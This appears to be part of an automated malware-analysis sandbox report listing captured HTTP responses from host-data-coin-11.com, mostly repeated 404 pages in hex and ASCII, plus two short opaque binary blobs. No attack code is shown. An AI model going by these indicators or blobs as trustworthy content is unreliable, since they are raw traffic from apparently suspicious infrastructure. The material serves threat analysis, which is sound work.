                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
